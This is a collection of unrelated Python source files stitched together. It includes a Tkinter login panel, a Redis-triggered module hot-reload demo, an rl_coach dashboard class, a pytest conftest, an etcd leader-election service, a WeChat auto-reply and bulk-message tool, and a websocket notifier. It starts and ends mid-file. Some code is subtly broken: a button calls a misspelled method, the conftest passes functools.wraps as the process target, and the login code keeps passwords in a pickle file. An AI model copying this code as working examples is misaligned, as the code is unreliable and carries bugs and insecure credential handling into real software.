def buttonLogout(self):
if self.allunits['Control'].ResultWidget and self.allunits['Control'].ResultWidget.switch and self.allunits['Control'].ResultWidget.cluster:
tkMessageBox.showerror(title='Error', message="Optimization (cluster mode) is still running! Please stop the optimization first." )
else:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
self.abqLicense_on=False
self.server.close()
self.showLicense.config(text="--")
self.radios[1].config(state='disabled')
self.radio_var.set(0)
def params(self):
try:
f = open('login.txt', 'rb')
except IOError:
p = {'username': '', 'password':'', 'checkb': 0, 'server':''}
else:
p = load(f)
f.close()
return p
def setServer(self):
self.SetServer = Pmw.Dialog(self.parent,
buttons=('OK', 'Cancel'),
command = self.actionSetServer)
self.Instruction = Label(self.SetServer.interior(), text="Input the name or the IP address of the server:")
self.Instruction.pack()
self.SAddress = Entry(self.SetServer.interior(), textvariable=self.sAddress)
self.SAddress.pack()
def actionSetServer(self, result):
if result == 'OK':
self.parameters['Login']['server']=self.sAddress.get()
self.SetServer.destroy()
if __name__ == "__main__":
root = Tk()
login = Login(root, {'Login': {}}, {})  # minimal placeholder arguments: Login expects parameters and allunits dicts
root.mainloop()
|
__init__.py
|
# -*- coding: utf-8 -*-
import threading
import sys
from PyQt5 import QtWidgets
from updateServer.HotUpdate import myfunction
import redis
import random
import importlib
from updateServer.HotUpdate.HotFixSample import Ui_MainWindow
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.fun = importlib.import_module("myfunction")
self.pushButton.clicked.connect(self.runFunction)
self.pushButton_2.clicked.connect(self.hotfix)
self.ip = "47.101.195.58"
self.redisport = 2017
self.redis_manager = redis.StrictRedis(self.ip, port=self.redisport)
# self.textBrowser.append(str(sys.modules))
print(sys.modules)
self.tunnel = self.redis_manager.pubsub()
self.tunnel.subscribe(["update"])
self.threads = []
self.t1 = threading.Thread(target=self.autoReload, )
self.threads.append(self.t1)
self.threads[0].setDaemon(True)
self.threads[0].start()
def autoReload(self):
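# Block on the redis pubsub 'update' channel; a b'reload' message triggers a hot reload.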
for k in self.tunnel.listen():
if k.get('data') == b'reload':
self.hotfix()
def runFunction(self):
version = self.fun.AllFunction().version
self.textBrowser.append("功能运行,当前版本为:" + version)
for i in range(4):
x = random.randint(-454, 994)
y = random.randint(-245, 437)
self.textBrowser.append(str(x) + "\tfunction version {}\t".format(version) + str(y) + " = " + str(
self.fun.AllFunction().second(x, y)))
# self.textBrowser.append(self.fun.AllFunction().first())
def hotfix(self):
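# Drop the cached module so importlib re-imports myfunction from disk and picks up changes.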
del sys.modules["myfunction"]
self.fun = importlib.import_module('myfunction')
self.textBrowser.append("热更新完毕")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
mainWindow = MainWindow()
mainWindow.show()
sys.exit(app.exec_())
|
signals_files_group.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from multiprocessing import Process, Manager
from os.path import basename
import pandas as pd
from rl_coach.dashboard_components.globals import x_axis_options, add_directory_csv_files, show_spinner, x_axis
from rl_coach.dashboard_components.signals_file_base import SignalsFileBase
from rl_coach.dashboard_components.signals_file import SignalsFile
class SignalsFilesGroup(SignalsFileBase):
def __init__(self, csv_paths, plot=None):
super().__init__(plot)
self.full_csv_paths = csv_paths
self.signals_files = []
if len(csv_paths) == 1 and os.path.isdir(csv_paths[0]):
self.signals_files = [SignalsFile(str(file), load=False, plot=plot) for file in add_directory_csv_files(csv_paths[0])]
else:
for csv_path in csv_paths:
if os.path.isdir(csv_path):
self.signals_files.append(SignalsFilesGroup(add_directory_csv_files(csv_path), plot=plot))
else:
self.signals_files.append(SignalsFile(str(csv_path), load=False, plot=plot))
parent_directory_path = os.path.abspath(os.path.join(os.path.dirname(csv_paths[0]), '..'))
if len(os.listdir(parent_directory_path)) == 1:
# get the parent directory name (since the current directory is the timestamp directory)
self.dir = parent_directory_path
else:
# get the common directory for all the experiments
self.dir = os.path.dirname('/'.join(os.path.commonprefix(csv_paths).split('/')[:-1]) + '/')
self.filename = '{} - Group({})'.format(basename(self.dir), len(self.signals_files))
self.signal_files_need_update = False
self.load()
def load_csv(self):
global x_axis
# load the csv's for all workers
processes = []
results = Manager().dict()
corrupted_files_idx = []
for idx, signal_file in enumerate(self.signals_files):
if not isinstance(signal_file, SignalsFilesGroup):
processes.append(Process(target=signal_file.load_csv, args=(idx, results)))
processes[-1].start()
[p.join() for p in processes]
# load csv's for SignalsFilesGroup serially for now. TODO: we should later parallelize this as well.
for idx, signal_file in enumerate(self.signals_files):
if isinstance(signal_file, SignalsFilesGroup):
signal_file.load_csv()
for idx, signal_file in enumerate(self.signals_files):
if len(list(results.keys())) > 0:
signal_file.csv, signal_file.last_modified = results[idx]
if not all(option in signal_file.csv.keys() for option in x_axis_options):
print("Warning: {} file seems to be corrupted and does contain the necessary columns "
"and will not be rendered".format(signal_file.filename))
corrupted_files_idx.append(idx)
# remove corrupted worker files (delete from the end so earlier indices stay valid)
for file_idx in sorted(corrupted_files_idx, reverse=True):
del self.signals_files[file_idx]
# get the stats of all the columns
if len(self.signals_files) > 1:
transformed_signals_files = []
subsampling = None
for idx in range(len(self.signals_files)):
transformed_signals_files.append(self.signals_files[idx].csv.copy(deep=True))
# change the index to be the currently selected x axis
transformed_signals_files[-1].index = transformed_signals_files[-1][x_axis[0]]
# remove all duplicate index rows
transformed_signals_files[-1] = transformed_signals_files[-1][~transformed_signals_files[-1].index.duplicated()]
# fill up missing row indices. we are going to take the mean over the group and we want to make sure
# the entire group has some value for every possible index.
num_rows = int(transformed_signals_files[-1].index.values[-1])
transformed_signals_files[-1] = transformed_signals_files[-1].reindex(range(num_rows))
transformed_signals_files[-1].interpolate(inplace=True)
# sub sample the csv to max of 5000 indices (do the same subsampling to all files)
if subsampling is None:
subsampling = max(1, num_rows // 5000)
transformed_signals_files[-1] = transformed_signals_files[-1].iloc[::subsampling, :]
csv_group = pd.concat([signals_file for signals_file in transformed_signals_files])
columns_to_remove = [s for s in csv_group.columns if '/Stdev' in s] + \
[s for s in csv_group.columns if '/Min' in s] + \
[s for s in csv_group.columns if '/Max' in s]
for col in columns_to_remove:
del csv_group[col]
csv_group = csv_group.groupby(csv_group.index)
self.csv_mean = csv_group.mean()
self.csv_mean.columns = [s + '/Mean' for s in self.csv_mean.columns]
self.csv_stdev = csv_group.std()
self.csv_stdev.columns = [s + '/Stdev' for s in self.csv_stdev.columns]
self.csv_min = csv_group.min()
self.csv_min.columns = [s + '/Min' for s in self.csv_min.columns]
self.csv_max = csv_group.max()
self.csv_max.columns = [s + '/Max' for s in self.csv_max.columns]
# get the indices from the file with the least number of indices and which is not an evaluation worker
file_with_min_indices = transformed_signals_files[0]
for signals_file in transformed_signals_files:
if signals_file.shape[0] < file_with_min_indices.shape[0] and \
'Training reward' in signals_file.keys():
file_with_min_indices = signals_file
self.index_columns = file_with_min_indices[x_axis_options]
# concat the stats and the indices columns
num_rows = file_with_min_indices.shape[0]
self.csv = pd.concat([self.index_columns, self.csv_mean.head(num_rows), self.csv_stdev.head(num_rows),
self.csv_min.head(num_rows), self.csv_max.head(num_rows)], axis=1)
# remove the stat columns for the indices columns
columns_to_remove = [s + '/Mean' for s in x_axis_options] + \
[s + '/Stdev' for s in x_axis_options] + \
[s + '/Min' for s in x_axis_options] + \
[s + '/Max' for s in x_axis_options]
for col in columns_to_remove:
if col in self.csv.keys():
del self.csv[col]
else: # This is a group of a single file
self.csv = self.signals_files[0].csv
# remove NaNs
self.csv.fillna(value=0, inplace=True) # removing this line will make bollinger bands fail
for key in self.csv.keys():
if 'Stdev' in key and 'Evaluation' not in key:
self.csv[key] = self.csv[key].fillna(value=0)
self.signal_files_need_update = True
def reload_data(self):
SignalsFileBase.reload_data(self)
def update_x_axis_index(self):
SignalsFileBase.update_x_axis_index(self)
# update the x axis for the bollinger bands
for signal in self.signals.values():
if signal.has_bollinger_bands:
signal.set_bands_source()
def toggle_y_axis(self, signal_name=None):
for signal in self.signals.values():
if signal.selected:
signal.toggle_axis()
def change_averaging_window(self, new_size, force=False, signals=None):
SignalsFileBase.change_averaging_window(self, new_size, force, signals)
def set_signal_selection(self, signal_name, val):
self.show_files_separately(self.separate_files)
SignalsFileBase.set_signal_selection(self, signal_name, val)
def file_was_modified_on_disk(self):
for signal_file in self.signals_files:
if signal_file.file_was_modified_on_disk():
return True
return False
def show_files_separately(self, val):
self.separate_files = val
# lazy updating of the signals of each of the workers
if self.separate_files and self.signal_files_need_update:
for signal_file in self.signals_files:
signal_file.update_source_and_signals()
self.signal_files_need_update = False
for signal in self.signals.values():
if signal.selected:
if val:
signal.set_dash("4 4")
else:
signal.set_dash("")
for signal_file in self.signals_files:
try:
if val:
signal_file.set_signal_selection(signal.name, signal.selected)
else:
signal_file.set_signal_selection(signal.name, False)
except:
pass
|
conftest.py
|
import sys
import threading
from functools import partial, wraps
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
configurationService.py
|
import etcd3
import logging
import threading
import datetime
import uuid
import traceback
import json
import version
import simpleProducer
DEFAULT_HOST="etcd"
DEFAULT_PORT=2379
DEFAULT_LEADER_KEY = 'leader'
DEFAULT_LEASE_TTL = 5
DEFAULT_SLEEP = 1
DEFAULT_ETCD_ROOT = "CryptoDataAnalyzer"
DIR_VALUE = "."
def combine_path(pathes):
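"""Join path segments with single slashes, skipping empty parts.
A single segment is returned unchanged. The result keeps a trailing slash
only when the last segment ends with one, e.g. combine_path(["a/", "b"])
returns "a/b" and combine_path(["a", "b/"]) returns "a/b/".
"""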
if not pathes:
return
if len(pathes) == 1:
return pathes[0]
path = pathes[0].rstrip("/") + "/"
for part in [p for p in pathes[1:] if p]:
part = part.rstrip("/")
if part:
path += part.rstrip("/") + "/"
if pathes[-1].rstrip("/") == pathes[-1]:
path = path.rstrip("/")
return path
def deserialize(value):
value = value.decode("utf-8")
if value == DIR_VALUE:
return None
try:
result = json.loads(value) if value != None else None
except ValueError:
result = value
return result
class EtcdConfigurationService(object):
def __init__(self, etcd_host, etcd_port, root,
processor_type,
stop_event = None,
id=None,
leader_election_enabled=True,
registration_enabled=True):
self._id = id or uuid.uuid1()
self._etcd_host = etcd_host
self._etcd_port = etcd_port
self.root = combine_path([root, processor_type])
self.leader_key = combine_path([self.root, DEFAULT_LEADER_KEY])
self._processor_type = processor_type
self._register_lease = None
self.leader_event = threading.Event()
self.work_callback = lambda leader: True
self.leader_callback = lambda: True
self.follower_callback = lambda: True
self.register_callback = lambda: True
self._client = etcd3.client(host=self._etcd_host,
port=self._etcd_port)
self._leader_election_enabled = leader_election_enabled
self._registration_enabled = registration_enabled
if self._registration_enabled:
self._stop = stop_event
self._thread = threading.Thread(target=self._run, daemon = True)
self._service_client = etcd3.client(host=self._etcd_host,
port=self._etcd_port)
if not self._stop:
raise Exception("Stop event is mandatory if registration is enabled")
def start(self):
serv_dir = combine_path([self.root, "services"])
self._mkdir(self._service_client, serv_dir)
self._thread.start()
def stop(self):
self._stop.set()
def _put_not_exist(self, client, key, value, lease=None):
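# Atomic "create if absent": the transaction puts the key only when its version
# is 0, i.e. the key does not exist yet. Returns True if the put succeeded.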
status, _ = client.transaction(
compare=[
client.transactions.version(key) == 0
],
success=[
client.transactions.put(key, value, lease)
],
failure=[],
)
return status
def _leader_election(self):
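# Try to become leader by creating the leader key under a short TTL lease.
# Returns (acquired, lease); when leader election is disabled, acquisition is
# always reported as successful.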
lease = None
value = simpleProducer.value_serializer({
"id" : self._id,
"election_time" : datetime.datetime.now()
})
try:
lease = self._service_client.lease(DEFAULT_LEASE_TTL)
if self._leader_election_enabled:
status = self._put_not_exist(self._service_client, self.leader_key, value, lease)
else:
status = True
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
status = False
return status, lease
def _mkdir(self, client, path, ephemeral=False, lease=None):
if ephemeral:
lease = self._register_lease
parts = path.split("/")
directory = ""
for part in parts:
if directory != "":
directory += "/"
directory += part
self._put_not_exist(client, directory, DIR_VALUE, lease)
def _register(self):
if not self._registration_enabled:
return
serv_dir = combine_path([self.root, "services", str(self._id)])
key = combine_path([serv_dir,"id"])
value = simpleProducer.value_serializer({
"id" : self._id,
"version" : version.__version__,
"start_time" : datetime.datetime.now()
})
lease = None
try:
lease = self._service_client.lease(DEFAULT_LEASE_TTL)
self._mkdir(self._service_client, serv_dir, lease=lease)
self._service_client.put(key, value, lease)
logging.info('registered {} id: {} v: {}'.format(
self._processor_type, self._id, version.__version__))
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
return lease
def put_config(self, path, key, value):
serv_dir = combine_path(["config", path])
self.put(serv_dir, key, value, ephemeral=False)
def del_config(self, path, key):
path = combine_path(["config", path, key])
self.delete(path)
def get_config(self, path):
path = combine_path(["config", path, "/"])
return self.get(path)
def put_status(self, path, key, value, lease=None):
serv_dir = combine_path(["services", str(self._id), path])
if lease:
self.put(serv_dir, key, value, lease=lease)
else:
self.put(serv_dir, key, value, ephemeral=True)
def del_status(self, path, key):
path = combine_path(["services", str(self._id), path, key])
self.delete(path)
def get_status(self, path):
path = combine_path(["services", str(self._id), path, "/"])
return self.get(path)
def put(self, path, key, value, ephemeral=True, lease=None):
if not (self._thread.is_alive() and self._register_lease):
return False
path = combine_path([self.root, path])
key = combine_path([path, key])
value = simpleProducer.value_serializer(value)
logging.debug("put {}: {}, ephemeral: {}".format(key, value, ephemeral))
if ephemeral:
lease = self._register_lease
try:
self._mkdir(self._client, key, ephemeral)
self._client.put(key, value, lease)
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
return False
return True
def delete(self, path):
path = combine_path([self.root, path])
logging.debug("delete {}".format(path))
self._client.delete(path)
def get(self, path):
path = combine_path([self.root, path])
logging.debug("get {}".format(path))
data = self._client.get_prefix(path)
kv = {}
metadata = {}
for datum in data:
value = deserialize(datum[0])
if not value:
continue
metadatum = datum[1]
key = metadatum.key.decode("utf-8")
kv[key] = value
metadata[key] = metadatum
logging.debug("got {}".format(str(kv)))
return kv, metadata
def _run_work(self, leader, leader_lease=None):
self._register_lease.refresh()
self.work_callback(leader)
def _run(self):
try:
self._register_lease = self._register()
self.register_callback()
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._register_lease = None
return
try:
while not self._stop.is_set():
if self._leader_election_enabled:
logging.info('leader election {}'.format(self._id))
leader, lease = self._leader_election()
if leader:
if self._leader_election_enabled:
logging.info('leader {}'.format(self._id))
self.leader_event.set()
self.leader_callback()
try:
while not self._stop.wait(DEFAULT_SLEEP):
lease.refresh()
self._run_work(leader=True, leader_lease=lease)
return
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
return
finally:
lease.revoke()
else:
logging.info('follower; standby {}'.format(self._id))
election_event = threading.Event()
def watch_cb(event):
if isinstance(event, etcd3.events.DeleteEvent):
election_event.set()
watch_id = self._service_client.add_watch_callback(self.leader_key, watch_cb)
self.follower_callback()
try:
while not election_event.is_set():
if self._stop.wait(DEFAULT_SLEEP):
return
self._run_work(leader=False)
logging.info('new election {}'.format(self._id))
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
return
finally:
self._service_client.cancel_watch(watch_id)
finally:
if self._register_lease:
self._register_lease.revoke()
self._register_lease = None
|
WeChatAssistant.py
|
# -*- coding:utf-8 -*-
"""
Features implemented:
1. Automatic replies
2. Graphical user interface
3. Customizable reply content
4.
"""
import itchat
import re
from tkinter import *
from tkinter import ttk
import tkinter.scrolledtext as tst
import threading
import queue
import time
from basedata import jsonManage
Listen_Flag = False
js = jsonManage()
keyword_dict = {}
group_list = []
frind_dict = {}
q = queue.Queue()
@itchat.msg_register(itchat.content.TEXT)
def text_reply(msg):
print(msg)
if (Listen_Flag == True):
if msg['Type'] == 'Text':
reply_content = msg['Text']
for key, value in keyword_dict.items():
if re.search(key, reply_content):
itchat.send(value, toUserName=msg['FromUserName'])
str = '(%s) -> %s\n' % (
msg.User['NickName'], reply_content)
q.put(str)
@itchat.msg_register(itchat.content.TEXT, isGroupChat=True)
def group_chat_reply(msg):
if (Listen_Flag == True):
if msg.User["NickName"] in group_list:
if msg['Type'] == 'Text':
reply_content = msg['Text']
for key, value in keyword_dict.items():
if re.search(key, reply_content):
itchat.send(value, toUserName=msg['FromUserName'])
str = '【%s】:(%s) -> %s\n' % (msg.User["NickName"],
msg.User.Self['NickName'], reply_content)
q.put(str)
class App(object):
def __init__(self, root):
self.root = root
self.root.size = '440*440'
self.root.title('WeChat Assistant')
self.root.geometry('500x500')
self.root.resizable(False,False)
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.tabControl = ttk.Notebook(self.root)
self.tab1 = ttk.Frame(self.tabControl)
self.tab1.columnconfigure(0, weight=1)
self.tab1.rowconfigure(0, weight=1)
self.tabControl.add(self.tab1, text='Monitor')
self.tab2 = ttk.Frame(self.tabControl)
self.tab2.columnconfigure(0, weight=1)
self.tab2.rowconfigure(0, weight=1)
self.tabControl.add(self.tab2, text='Keywords')
self.tab3 = ttk.Frame(self.tabControl)
self.tab3.columnconfigure(0, weight=1)
self.tab3.rowconfigure(0, weight=1)
self.tabControl.add(self.tab3, text='Multi-group send')
self.tabControl.pack(expand=1, fill=BOTH)
self.tab4 = ttk.Frame(self.tabControl)
self.tab4.columnconfigure(0, weight=1)
self.tab4.rowconfigure(0, weight=1)
self.tabControl.add(self.tab4, text='Broadcast')
self.tabControl.pack(expand=1, fill=BOTH)
# tab1
self.a_mighty = ttk.LabelFrame(self.tab1, text='Monitor panel ')
self.a_mighty.pack(fill=BOTH, expand=1)
self.a_listbox1 = tst.ScrolledText(self.a_mighty)
self.a_listbox1.pack(fill=BOTH, expand=1)
self.button_login = Button(self.tab1, text='Login', command=self.Login_in)
self.button_login.pack(padx=5, pady=0, side=LEFT, anchor=NW)
self.button_listen = Button(
self.tab1, text="Start monitoring", command=self.Listen_ON)
self.button_listen.pack(padx=5, pady=0, side=LEFT, anchor=NW)
self.button_clear = Button(
self.tab1, text='Clear', command=self.ClearMeaaage)
self.button_clear.pack(padx=10, pady=0, side=LEFT, anchor=NW)
# tab2
self.b_mighty = ttk.LabelFrame(self.tab2, text='Keywords')
self.b_mighty.pack(fill=BOTH, expand=1)
self.b_listbox1 = Listbox(self.b_mighty, width=33, height=10)
self.b_listbox2 = Listbox(self.b_mighty, width=33, height=10)
self.b_listbox1.pack(padx=5,side=LEFT, anchor=NW,fill=BOTH)
self.b_listbox2.pack(padx=5,side=LEFT, anchor=NW,fill=BOTH)
self.b_lable1 = Label(self.tab2, text="Keyword")
self.b_lable1.pack( padx=0, pady=5, side=LEFT)
self.b_key_input = tst.ScrolledText(self.tab2, width=22, height=2)
self.b_key_input.pack( padx=0, pady=5, side=LEFT)
self.b_lable2 = Label(self.tab2, text="Reply content")
self.b_lable2.pack( padx=0, pady=0, side=LEFT)
self.b_value_input = tst.ScrolledText(self.tab2, width=22, height=2)
self.b_value_input.pack( padx=0, pady=0, side=LEFT, anchor=S)
self.button_add_keyword = Button(
self.tab2, text='增加', command=self.AddKeyword)
self.button_add_keyword.pack(padx=0, pady=0, side=TOP, anchor=NW)
self.button_delete_keyword = Button(
self.tab2, text='删除', command=self.DeleteKeyword)
self.button_delete_keyword.pack(padx=0, pady=0, side=LEFT, anchor=S)
# tab3
self.c_mighty = ttk.LabelFrame(self.tab3, text='多群发送')
self.c_mighty.pack(fill=BOTH, expand=1)
self.c_Listname = Listbox(self.c_mighty, selectmode=MULTIPLE)
self.c_Listname.pack(padx=10)
self.c_lable = Label(self.tab3, text="只能检测到未免打扰的群,如果还有未检测到的群,请点击添加到通讯录")
self.c_lable.pack( padx=0, pady=5, side=LEFT)
self.c_input = tst.ScrolledText(self.c_mighty, width=65, height=7)
self.c_input.pack(padx=0, pady=0, side=BOTTOM, anchor=NW)
self.button_send = Button(
self.tab3, text='发送', command=self.SendMessage_thread)
self.button_send.pack(padx=10, pady=0, side=RIGHT, anchor=NW)
# tab4
self.d_mighty = ttk.LabelFrame(self.tab4, text='群发')
self.d_mighty.pack(fill=BOTH, expand=1)
self.d_Listname = Listbox(self.d_mighty, selectmode=MULTIPLE)
self.d_Listname.pack(padx=10)
self.d_input = tst.ScrolledText(self.d_mighty, width=65, height=7)
self.d_input.pack(padx=0, pady=0, side=BOTTOM, anchor=NW)
self.d_button_send = Button(
self.tab4, text='发送', command=self.SendFriend)
self.d_button_send.pack(padx=10, pady=0, side=RIGHT, anchor=NW)
def Login_in(self):
self.thread1 = threading.Thread(target=self.wechat_login)
self.thread1.setDaemon(True)
self.thread1.start()
self.button_login.config(text='退出', command=self.Login_out)
self.button_login['bg'] = 'green'
self.ShowKeyWord()
def Login_out(self):
self.thread = threading.Thread(target=self.wechat_logout)
self.thread.setDaemon(True)
self.thread.start()
self.button_login.config(text='登陆', command=self.Login_in)
self.button_login['bg'] = 'white'
def wechat_login(self):
try:
itchat.auto_login(hotReload=True)
except:
q.put("您的微信未能正确登陆,可能是注册时间太短,微信禁止登陆网页版微信")
chatroomsList =itchat.get_chatrooms()
for chatroom in chatroomsList:
group_list.append(chatroom["NickName"])
js.writejson('groupdata.json',group_list)
self.ShowGroup()
self.ShowFriends()
itchat.run()
def wechat_logout(self):
itchat.logout()
def Listen_ON(self):
global Listen_Flag
if(Listen_Flag == False):
self.button_listen['bg'] = 'green'
self.button_listen.config(text='停止监控', command=self.Listen_OFF)
self.thread = threading.Thread(target=self.ShowMessage)
self.thread.setDaemon(True)
self.thread.start()
Listen_Flag = True
def Listen_OFF(self):
global Listen_Flag
if(Listen_Flag == True):
self.button_listen['bg'] = 'white'
self.button_listen.config(text='启动监控', command=self.Listen_ON)
Listen_Flag = False
def ShowMessage(self):
while(True):
while not q.empty():
str = q.get()
self.a_listbox1.insert(END, str)
self.a_listbox1.see(END)
time.sleep(1)
def ClearMessage(self):
self.a_listbox1.delete(1.0, END)
def ShowKeyWord(self):
global keyword_dict
keyword_dict = js.readjson('keyword.json')
self.b_listbox1.delete(0,'end')
self.b_listbox2.delete(0,'end')
for key, value in keyword_dict.items():
self.b_listbox1.insert(END, key)
self.b_listbox2.insert(END, value)
def AddKeyword(self):
global keyword_dict
key = None
value = None
key = self.b_key_input.get(1.0, END)
value = self.b_value_input.get(1.0, END)
if(key.isspace() == True or value.isspace() == True):
key = None
value = None
return
keyword_dict[key] = value
js.writejson('keyword.json',keyword_dict)
self.b_key_input.delete(1.0, END)
self.b_value_input.delete(1.0, END)
self.ShowKeyWord()
def DeleteKeyword(self):
global keyword_dict
for i in range(len(keyword_dict)):
if(self.b_listbox1.selection_includes(i) == True):
key = self.b_listbox1.get(i)
keyword_dict.pop(key)
js.writejson('keyword.json',keyword_dict)
self.ShowKeyWord()
def ShowGroup(self):
self.c_Listname.delete(0,'end')
for group in group_list:
try:
self.c_Listname.insert(END, group)
except:
q.put("您有群的昵称包含表情(emoji),超出此软件的显示范围,您可以修改群名称,去除emoji,请谅解。")
def ShowFriends(self):
friendslist = itchat.get_friends(update=True)[1:]
global frind_dict
for frind in friendslist:
if (frind['RemarkName'] == ''):
frind_dict[frind['NickName']] = frind['NickName']
try:
self.d_Listname.insert(END, frind['NickName'])
except:
q.put("您有好友的昵称包含表情(emoji),超出此软件的显示范围,您可以修改好友备注,去除emoji,请谅解。")
else:
frind_dict[frind['RemarkName']] = frind['NickName']
try:
self.d_Listname.insert(END, frind['RemarkName'])
except:
q.put("您有好友的昵称包含表情(emoji),超出此软件的显示范围,您可以修改好友备注,去除emoji,请谅解。")
print(frind_dict)
def SendFriend(self):
global frind_dict
for i in range(len(frind_dict)):
if(self.d_Listname.selection_includes(i) == True):
key = self.d_Listname.get(i)
value = frind_dict[key]
str = self.d_input.get(1.0, END)
self.d_input.delete(1.0, END)
frind = itchat.search_friends(nickName=value)[0]['UserName']
itchat.send(str,toUserName=frind)
def SendMessage(self):
for i, group in enumerate(group_list):
if(self.c_Listname.selection_includes(i) == True):
groups = itchat.search_chatrooms(name=group)
groupname = groups[0]['UserName']
str = self.c_input.get(1.0, END)
self.c_input.delete(1.0, END)
itchat.send(str, toUserName=groupname)
def SendMessage_thread(self):
self.thread = threading.Thread(target=self.SendMessage)
self.thread.setDaemon(True)
self.thread.start()
def remove_emoji(self, string):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', string)
if __name__ == "__main__":
root = Tk()
tool = App(root)
root.mainloop()
|
ws.py
|
from json import dumps
from logging import getLogger
from os import getenv
from time import sleep
from threading import Thread
from websocket import WebSocketApp
from .ws_settings import ws_settings
PYPLAN_API_HOST = getenv(
'PYPLAN_API_HOST', default='http://pyplanapi:8000/api')
WS_PROTOCOL = 'wss' if 'https' in PYPLAN_API_HOST else 'ws'
WS_URI = f'{WS_PROTOCOL}://{PYPLAN_API_HOST.split("://")[1]}/ws'
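# Worked example of the URI derivation above: with the default
# PYPLAN_API_HOST of 'http://pyplanapi:8000/api' this yields
# WS_URI = 'ws://pyplanapi:8000/api/ws'; an 'https://...' host would
# switch the scheme to 'wss'.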
logger = getLogger('django')
class WS:
def __init__(self, company_code: str, session_key: str):
self.company_code = company_code
self.session_key = session_key
self.ws = self._start()
def _start(self):
socket_uri = f'{WS_URI}/notifications/{self.company_code}/?sessionKey={self.session_key}'
ws = WebSocketApp(socket_uri, on_open=self._on_open,
on_error=self._on_error, on_close=self._on_close)
def start_run(ws):
ws.run_forever(ping_interval=10)
th = Thread(target=start_run, args=(ws,))
th.start()
return ws
def _on_open(self, ws):
try:
ws.send(dumps({
'command': 'join',
'room': self.session_key,
'message': 'Engine Joining!',
'company_code': self.company_code,
}))
except Exception as ex:
logger.error(f'Error in WebSocket join: {str(ex)}')
def _ensure_ws(self):
if self.ws is None or not self.ws.keep_running:
self.ws = self._start()
nn = 0
while nn < 10:
if self.ws is not None and self.ws.keep_running:
break
sleep(1)
nn += 1
def _on_close(self, ws):
logger.error('WebSocket has closed')
def _on_error(self, ws, error):
logger.error(f'Error in WebSocket: {str(error)}')
def sendMsg(self, message, title=None):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_MESSAGE,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'message': message,
'title': title if title is not None else '',
}))
except Exception as ex:
logger.error(f'Error in WebSocket sendMsg: {str(ex)}')
def progressbar(self, progress, message=None):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_PROGRESSBAR,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'progress': progress,
'message': message if message is not None else ''
}))
except Exception as ex:
logger.error(f'Error in WebSocket send: {str(ex)}')
def sendDebugInfo(self, node, title, action, time=0, usedMemory=0, totalMemory=0, fromDynamic=False):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_DEBUG_MODE_INFO,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'message': '',
'node': node,
'title': title,
'action': action,
'fromDynamic': fromDynamic,
'time': time,
'usedMemory': usedMemory,
'totalMemory': totalMemory
}))
except Exception as ex:
logger.error(f'Error in WebSocket sendDebugInfo: {str(ex)}')
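# A minimal usage sketch of the WS helper above (hedged: the company code,
# session key and message text are placeholders, and ws_settings must be
# importable for this module to load at all):
#
#     ws = WS(company_code='acme', session_key='abc123')
#     ws.sendMsg('Model evaluation finished', title='Engine')
#     ws.progressbar(75, message='Crunching numbers...')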
|
WatchDog.py
|
import gc
import os
import sys
import time
import logging
import win32api
import win32job
import win32con
import threading
import subprocess
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
